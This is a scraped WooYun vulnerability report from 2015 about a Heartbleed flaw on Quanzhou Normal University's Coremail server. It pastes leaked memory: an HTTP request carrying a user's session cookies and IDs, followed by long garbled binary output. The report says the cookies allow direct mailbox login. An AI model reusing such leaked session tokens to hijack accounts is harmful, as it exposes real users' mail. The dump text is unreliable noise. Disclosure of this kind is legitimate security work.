泉州师范院心脏滴血漏洞可登陆邮箱 | wooyun-2015-0107337| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107337

漏洞标题：泉州师范院心脏滴血漏洞可登陆邮箱

漏洞作者：路人甲

提交时间：2015-04-14 12:13

修复时间：2015-04-20 14:22

公开时间：2015-04-20 14:22

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-14：细节已通知厂商并且等待厂商处理中
2015-04-20：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

泉州师范院心脏滴血漏洞可登陆邮箱

详细说明：

1.泉州师范学院心脏滴血漏洞

@ @ -P穁?皤氥鬁c3A7l$`躀g慢?  3?   rGpDNNbnFcTBXnQKbD HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://mail.qztc.edu.cn/coremail/XJS/index.jsp?sid=BAtnWINNoQUHhxrGpDNNbnFcTBXnQKbD
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; staticlogin:product=cbpro09&act=login&info=ZmlsZW5hbWU9Y2liYXNldHVwLmV4ZSZtYWM9NUUyRTU1MTFGMjVGNDYxMEE1MjJGRjc2Qjg1QUNEQzUmcGFzc3BvcnQ9JnZlcnNpb249MjAwOS4wNC4yMS4xMC4zMDImY3Jhc2h0eXBlPTE=&verify=3fcc15c3ff854ca34f45cd9b21020224;  TheWorld 6)
Accept-Encoding: gzip, deflate
Host: mail.qztc.edu.cn
Connection: Keep-Alive
Cookie: _gscu_985164786=28635459xtir2w11; uid=qztckyc; CoremailReferer=http%3A%2F%2Fmail.qztc.edu.cn%2F; Coremail.sid=BAtnWINNoQUHhxrGpDNNbnFcTBXnQKbD; Coremail=d58bd518c652153f2563e5390716cf91
*ど?,?嗟?①'霥
?铢睊寗o欅MHD
*1n0?m	??r??86=28562414h2tssx15; _gscbrs_985164786=1; Coremail.sid=BAFyWINNoWPChxPepDNNlSSnDDcdZMHD
d諉?-涞 做m?45e; _gscu_985164786=28562414h2tssx15; _gscbrs_985164786=1
秘?a款纇宣c鋀e?  `⒀     p堆      Ｑ     蔼?    牎?    阿?    `⒀     p堆      Ｑ     牎?    牎?    `⒀     p堆      Ｑ     @?   K^    P賷a?  氨?            ?  ?  `?           愊?    P賷a?                    ?  ?  `?           愊?    牎?    阿?    `⒀     p堆      Ｑ     @|?  鑳?  拦?    O{K^?  
 ha?  ???    a?          軍a?  8??        0??   Ｑ      Ｑ     h??  h??  愲?礻  愲?礻  樉礻  樉礻  牎?    阿?    `⒀     樁?     Ｑ      |?  h??   貉     軍a?  槻?        ?                   DU犼  匄?   DU犼                 牫?  ?K^?                                           a?                          些奱?          q{K^?          J`%a?   髸
?   匄?  頃
?  X??  X??  瑷SH?  3??  麽?   zp?  干??  ㏒H?  葎??  X养?  扄      敖 礻  ?      UUU       ?       ?    UUUU   ?       ?       ?  @        ?  ?       ?           ?           ?  ?       ?P_嚓  p_嚓  恄嚓  癬嚓  衉嚓  餩嚓  `嚓  0`嚓  P`嚓  p`嚓  恅嚓  癭嚓  衊嚓  餪嚓  a嚓  0a嚓  P?礻  p?礻  愡礻  斑礻  羞礻  疬礻  ?礻  0?礻  P?礻  p?礻  愢礻  班礻  朽礻  疣礻  ?礻  0?礻  €??  牱?  婪?  喾?   ??   ??  @??  `??  €??  牳?  栏?  喔?   ??   ??  @??  `??  €??  牴?  拦?  喙?   ??   ??  @??  `??  €??  牶?  篮?  嗪?   ??   ??  @??  `??          P蠠礻                 !       `狙                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           X瘠?  @??          ? 礻  ?礻  x礻  豜
礻  怗O礻  (HO礻  繦O礻  hIO礻  怚O礻  h]
礻      
   X瘠?  ??  埣?                                          ?塧?  ? 礻  ?礻  x礻  豜
礻  怗O礻  (HO礻  繦O礻  hIO礻  怚O礻  h]
礻   % 礻  ? 礻  ?礻  0HO礻   ) 礻                                          菵P礻  `DO黻  8??  ?  ??  @??  ???  皤坅?  H??  0??              e     ??  栊?  ?  ??  €??  亟?  0??  p坅?  澜?  埿?              f  `   `⒀     p堆     ??  爄庫?  ㄍ?  p坅?  ??  把?              g  `   p堆             ??  p??  埦?  p坅?  p??  X??              h  `   阿?            ??   DO黻  ??  0袌a?  谰?  罔红?               i  ?  p堆     菵P礻  `DO黻  h??  埦?  樎?  ??  柙?  ?塧?  (??  翱?              j             So黻  埦?  8?礻  ?  `??  (??  樐?  憟a?  樋?  8??              k  0           ?  ?  h??  `??  樎?  艉礻  h??  豬??  癷??  楻??  p膴a?  (??  犂?               l        ?                  桢?  0??  €羿?  咐B?  p▓a?  惱?   ??               m     费8  €?               X??  楻??  楻??  鳵??  惂坅?  ?  h??               n  $                 览?   ??  咐B?  豬??  唉坅?  X??  ?               o  D                  ?塧?  惲?  X??              q             埦?  ?  傲?  0塧?  枇?  鹆?              p      螣礻  燫o黻  `??  雷?  鳵??  €羿?  穲a?  @??  樜?              r      ?   DO黻  `??  ??  繠?   ?岅  i??  ??  樎?  (??  (??  0菆a?  嚷?  杳?              s  @  ?  `DO黻  h??  ?  0塧?   ??  x??              t      p螣礻  燫o黻  ?塧?  X??  ??              u             Pa庫?  Pa庫?  杪?  (??  h??   U??   U??  0袌a?  忻?  x??              v  ?  p堆             樎?  (??  樏?  (??  犼红?  楻??  樏?  纲?  @??  咐B?  0菆a?  X??  x??              w  @  ?  樎?  埦?  樏?  (??  H韬礻  鳵??  鳵??  ?塧?  饶?  樑?              x             埦?  埦?  8  ?  `??  (??  樐?  樐?  X??  X??  鹚?  0菆a?  X??  8??              y  @  ?  (??  樐?  Pa庫?  (??  版红?  鳵??         (??   繠?   ?岅  i??  ??  So黻  Pl庫?  So黻  So黻  So黻  €??                                          ?塧?  P??  犉?               z      老熿?  燫o黻  蹐a?  埰?                {                              €??   U??  楻??  愽??  0塧?  ?  8??               |       袩礻  燫o黻  ?塧?  0??                }              溶?  `??  楻??  0??  蹐a?  埱?                }                              0塧?  厍?  ??               ~      犘熿?  燫o黻  ?塧?  ??                              ??  ??  鳵??  pU??  p晥a?  h??                                             ?塧?  叭?  `??               ?                             0塧?   ??  ??               €      `褵礻  燫o黻  ??   U??   ?岅  鲟?  ?塧?  X??                ?      ?      譌礻  ?                                ?           ?黻     ?                             XJH嚓  牷礻  ?黻     ]                                 |   牷礻  百 黻  @??                                ?  牷礻   c?  ?                                     牷礻  樮 黻                                           牷礻  (?黻     ?                               ?  牷礻  8?黻   y_?  任 黻  P?黻  鹣 黻  P?黻  靶 黻  醒 黻  0?黻  愐 黻  鹨 黻   ?黻  仍 黻  ?黻  百 黻  樮 黻   ?黻  搁 黻  8?黻  h?黻  p?黻  胞 黻  €?黻   黻  ?黻  hs礻  (z礻  @}礻   礻  饛礻  皯礻  衶礻  p?礻  X?礻                               ?  牷礻   ?黻  X??                               ?  牷礻  x?黻  竨"?                                   G牷礻  h?黻  ?   鹕?                             ??  胞 黻    G忦邜0 @`(  @B 鹕?                            G??  €?黻  ?                                    牷礻   黻    G?                            彔?礻  ?黻    G  G                                G牷礻  H黻         G                                G牷礻  hs礻                                                 (z礻    G?                                牷礻   礻    G  G                             蠣?礻  H?礻     G  G疬? @`(  @(B B`4  ?佈F                               ?  牷礻  皯礻  X??                               ?  牷礻  x?礻  u"?                                ?  牷礻  竨"?  u"?                            $   ?  牷礻  p?礻  `K?  疤?           	   	       €K?  p?礻  饸礻  磏?  任 黻  P?黻  鹣 黻  P?黻  靶 黻  醒 黻  0?黻  愐 黻  鹨 黻   ?黻  仍 黻  ?黻  百 黻  樮 黻   ?黻  搁 黻  8?黻  h?黻  p?黻  胞 黻  €?黻   黻  ?黻  hs礻  (z礻  @}礻   礻  饛礻  皯礻  衶礻  p?礻  X?礻  饸礻  袥礻   ?礻  槴礻  槺礻  来礻  腹礻  X?礻  礻  ?礻  H?礻  樝礻  @?礻  匾礻  ?礻  堈礻  刂礻  茸礻  `?礻  柁礻  斑礻  愪礻  ?快?  *快?  ?快?  H8快?  ?快?  ?快?  P<快?  圗快?  0G快?  菻快?  疤?           	   	       €K?  p?礻  袥礻  竨"?                               ?  牷礻  韧0黻   髸
?                               ?  牷礻  槴礻  p}p?                             ?          来礻  X??                            !   ?  牷礻  X?礻  u"?                            !   ?  牷礻   ?礻  8觔?                            !   ?  牷礻  ?礻  干??                            !   ?  牷礻  嗌礻  ?K?                             $   ?  牷礻  u"?  ??                             '   ?  牷礻  樝礻  頃
?   ??           	   	       慀??  绪礻  匾礻  	K?   ??           	   	          ?  绪礻  ?礻  惔n?  犜?           	   	          ?  绪礻  ??  u"?   ??           	   	          ?  绪礻  刂礻  ???  `??                     X??  郉?  `?礻  傍??  `??                     X??  郉?  柁礻  X??   ??           	   	          ?  绪礻  ?快?  竨"?  疬? @`(  @(B B`4  ?佈F  ( 0 0  B@  惥??0T0T 1                           '   ?  牷礻  X??  X??                             /   ?  牷礻  ?快?  ?c?  嘣?           	   	       €K?   ?礻  ?快?  u"?  嘣?           	   	       €K?   ?礻  ?快?  u"?                             /   ?  牷礻  X??  ?K?                             F   ?  牷礻  圗快?  磏?  `??           	   	       磏?  p?礻  菻快?  8l?  `??           	   	       磏?  p?礻  K快?  垈B?  任 黻  P?黻  鹣 黻  P?黻  靶 黻  醒 黻  0?黻  愐 黻  鹨 黻   ?黻  仍 黻  ?黻  百 黻  樮 黻   ?黻  搁 黻  8?黻  h?黻  p?黻  胞 黻  €?黻   黻  ?黻  hs礻  (z礻  @}礻   礻  饛礻  皯礻  衶礻  p?礻  X?礻  饸礻  袥礻   ?礻  槴礻  槺礻  来礻  腹礻  X?礻  礻  ?礻  H?礻  樝礻  @?礻  匾礻  ?礻  堈礻  刂礻  茸礻  `?礻  柁礻  斑礻  愪礻  ?快?  *快?  ?快?  H8快?  ?快?  ?快?  P<快?  圗快?  0G快?  菻快?  K快?  窴快?  ]快?  坈快?  Pe快?  纄快?  恌快?  €l快?   p快?  ~快?  吙礻  8嚳礻  缞快?  p嬁礻  鄫快?  P尶礻  鄭快?  垙快?  0摽礻  p暱礻  €啛礻   墴礻  嫙礻  鑻熿?  P専礻  h彑礻  爲熿?  @湡礻  饻熿?  垶熿?  H牊礻  鵂熿?  0礻  去熿?  熿?  熿?  (盁礻  h矡礻  0礋礻  窡礻  熿?  (禑礻  翢礻  H脽礻  `臒礻  8鏌礻  歌熿?  魺礻  伥熿?  枘熿?  ?犾?  €犾?  ?犾?  ?桁?  P桁?   "桁?  ?桁?  ?桁?  ?桁?  ?桁?  @@桁?  €G桁?  xI桁?  鐸桁?                             5   ?  牷礻  8W快?  頃
?                             5   ?  牷礻  ]快?  hK?                             ?          坈快?  磏?                             <   ?  牷礻  鑗快?  u"?                             <   ?  牷礻  €l快?  X??                             ?           p快?  b?                             @   ?  牷礻  般0黻  竨"?                             @   ?  牷礻  ~快?  竨"?                             ?          8嚳礻   髸
?                             F   ?  牷礻  堹??  H-q?                            F   ?  牷礻  垙快?  X??  `??           	   	       8l?  `礻  p暱礻  u"?  `??           	   	       8l?  `礻  €啛礻  u"?  `??           	   	       %   ?  `礻  嫙礻  K?   h屿?  @h屿?  `h屿?  €h屿?  爃屿?  纇屿?  鄅屿?   i屿?   i屿?  @i屿?  `i屿?  €i屿?  爄屿?  纈屿?  鄆屿?   j屿?  犪?  泪?  噌?   ??   ??  @??  `??  €??  犫?  棱?  噔?   ??   ??  @??  `??  €??         x~ 礻  0p?                竵 礻  恡?                8?礻   u?                8?礻  Pu?                鑻 礻  鸶涭?                饞 礻                         x?礻   NE礻                ?礻  癗E礻                 安*礻                        ㄍ*礻  牳涭?                ?礻   t?                h?礻  q?                @O黻  0?                   ?O黻  鄒/礻                ?O黻  @w/礻                ?O黻  pt/礻         `??           	   	       8l?  `礻  爲熿?  X??  `??           	   	       %   ?  `礻   郻?  ?c?  `??           	   	       -   ?  `礻  @湡礻  u"?  `??           	   	       ??  困涭?  垶熿?  u"?  `??           	   	      
   ?  困涭?  H牊礻  ?K?  `??           	   	         ?  困涭?  去熿?  磏?  嚆?           	   	       
   ?  困涭?  u"?  8l?  `??           	   	      
   ?  困涭?  熿?  垈B?  犱?           
   
       X??  €皼礻  h矡礻  恲_?  犱?           
   
          ?  €皼礻  0礋礻  頃
?  犱?           
   
         ?  €皼礻  H脽礻  u"?  疬? @`(  @(B B`4  ?佈F  ( 0 0  B@  惥??0T0T q?€@@ 篞? -B!€  !B!€  E@? ?q?B €寑G  H犱?           
   
      	   ?  €皼礻  歌熿?  X??  `??                    	   ?  €皼礻  愰熿?  竨"?  犵?                    
   ?  困涭?  愰熿?   髸
?  噻?                     %   ?  `礻  愰熿?  0q?                             F   ?  牷礻  愰熿?  X??  犱?           
   
      	   ?  €皼礻  伥熿?  u"?  犺?                    	   ?  €皼礻  愾熿?  8鉨?  噼?                    
   ?  困涭?  愾熿?  干??   ??                     %   ?  `礻  愾熿?   K?                             F   ?  牷礻  愾熿?  ??   ??           
   
          ?  €皼礻  鋌?  頃
?  犱?           
   
         ?  €皼礻  ?犾?  pK?  噱?                     X??  €詻礻  ?犾?  磏?  噱?                       ?  €詻礻  ?桁?  u"?  犼?                         ?  €詻礻  桷0黻  X??  嚓?                        ?  €皼礻  桷0黻  ㄥb?   ??                    
   ?  困涭?  桷0黻  竨"?  `??                     %   ?  `礻  桷0黻  竨"?                             F   ?  牷礻  桷0黻   髸
?  噱?                         ?

2.利用1中的cookie可以直接登录

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-04-20 14:22

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107337

漏洞标题：泉州师范院心脏滴血漏洞可登陆邮箱

相关厂商：泉州师范院

漏洞作者：路人甲

提交时间：2015-04-14 12:13

修复时间：2015-04-20 14:22

公开时间：2015-04-20 14:22

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107337

漏洞标题：泉州师范院心脏滴血漏洞可登陆邮箱

相关厂商：泉州师范院

漏洞作者： 路人甲

提交时间：2015-04-14 12:13

修复时间：2015-04-20 14:22

公开时间：2015-04-20 14:22

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0107337"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云